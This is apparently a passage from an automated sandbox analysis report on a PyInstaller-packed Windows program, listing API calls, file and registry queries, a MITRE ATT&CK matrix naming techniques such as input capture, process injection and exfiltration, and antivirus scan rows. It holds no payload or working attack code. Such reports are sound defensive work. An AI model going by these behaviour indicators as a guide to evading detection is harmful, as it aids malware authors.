    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF7ACE96644 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF7ACE96644
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF7ACE87790 FindFirstFileExW,FindClose,2_2_00007FF7ACE87790
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF7ACEA08E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7ACEA08E4
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A80AA260 FindFirstFileExW,FindClose,wcscpy_s,_invalid_parameter_noinfo_noreturn,2_2_00007FF8A80AA260
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7EAB9D0 _Py_NoneStruct,_PyArg_ParseTuple_SizeT,GetSystemInfo,VirtualAlloc,_Py_Dealloc,PyExc_MemoryError,PyErr_SetString,_PyObject_GC_New,PyExc_NotImplementedError,PyErr_Format,Py_FatalError,PyObject_GC_Track,PyExc_SystemError,PyErr_SetString,_Py_Dealloc,_Py_Dealloc,2_2_00007FF8A7EAB9D0
    Source: app.exe, 00000002.00000002.3277731557.0000020832BC0000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2088340207.0000020832BEF000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000003.2088649225.0000020832C36000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWT
    Source: cacert.pem.0.dr Binary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACE8B5DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7ACE8B5DC
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACEA24D0 GetProcessHeap,0_2_00007FF7ACEA24D0
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACE8B7C0 SetUnhandledExceptionFilter,0_2_00007FF7ACE8B7C0
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACE8AFC4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7ACE8AFC4
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACE99A14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7ACE99A14
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF7ACE8B5DC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7ACE8B5DC
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF7ACE8B7C0 SetUnhandledExceptionFilter,2_2_00007FF7ACE8B7C0
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF7ACE8AFC4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF7ACE8AFC4
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF7ACE99A14 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7ACE99A14
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7E71390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A7E71390
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7E71960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A7E71960
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7E81390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A7E81390
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7E81960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A7E81960
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7E91390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A7E91390
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7E91960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A7E91960
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7EBB748 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A7EBB748
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7EBADE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A7EBADE0
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7EE3484 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A7EE3484
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7EE366C SetUnhandledExceptionFilter,2_2_00007FF8A7EE366C
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7EE2A48 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A7EE2A48
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7FF1AD8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8A7FF1AD8
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A7FF1090 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A7FF1090
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A80F34B4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A80F34B4
    Source: C:\Users\user\Desktop\app.exe Code function: 2_2_00007FF8A81313D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FF8A81313D4
    Source: C:\Users\user\Desktop\app.exe Process created: C:\Users\user\Desktop\app.exe "C:\Users\user\Desktop\app.exe"
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACEA88E0 cpuid 0_2_00007FF7ACEA88E0
    Source: C:\Users\user\Desktop\app.exe Code function: ___lc_locale_name_func,GetLocaleInfoEx,2_2_00007FF8A80CF4F0
    Source: C:\Users\user\Desktop\app.exe Code function: GetLocaleInfoEx,FormatMessageA,2_2_00007FF8A80B285C
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Hash VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\PublicKey VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\altgraph-0.17.2.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\certifi VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\nbformat-5.8.0.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\pyinstaller-5.3.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\ucrtbase.dll VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\base_library.zip VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\Desktop\app.exe VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\_ctypes.pyd VolumeInformation
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\base_library.zip VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\_socket.pyd VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\select.pyd VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\_bz2.pyd VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\pyexpat.pyd VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\_queue.pyd VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\_hashlib.pyd VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\_ssl.pyd VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\altgraph-0.17.2.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cffi-1.15.1.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\cryptography-36.0.2.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\dnspython-2.2.1.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\importlib_metadata-7.1.0.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\jsonschema-4.17.3.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\nbformat-5.8.0.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\pyinstaller-5.3.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\setuptools-69.5.1.dist-info VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\pywintypes38.dll VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core\_multiarray_umath.cp38-win_amd64.pyd VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\core\_multiarray_tests.cp38-win_amd64.pyd VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\linalg VolumeInformation
    Source: C:\Users\user\Desktop\app.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\linalg\_umath_linalg.cp38-win_amd64.pyd VolumeInformation
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\fft VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\fft VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\fft VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\fft\_pocketfft_internal.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\mtrand.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\bit_generator.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_common.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_bounded_integers.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_mt19937.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_philox.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random\_pcg64.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\numpy\random VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282 VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\_brotli.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\Desktop\app.exe VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI22282\zstandard\backend_c.cp38-win_amd64.pyd VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACE8B4C0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7ACE8B4C0
    Source: C:\Users\user\Desktop\app.exe Code function: 0_2_00007FF7ACEA4D50 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7ACEA4D50
    Source: C:\Users\user\Desktop\app.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 11 Process Injection | 11 Process Injection | 11 Input Capture | 2 System Time Discovery | Remote Services | 11 Input Capture | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
    Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 21 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
    Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Timestomp | NTDS | 35 System Information Discovery | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | 11 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_ARC4.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_Salsa20.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_chacha20.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_pkcs1_decode.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_aes.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_aesni.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_arc2.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_blowfish.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cast.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cbc.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_cfb.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_ctr.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_des.pyd | 0% | ReversingLabs
    C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_des3.pyd | 0% | ReversingLabs
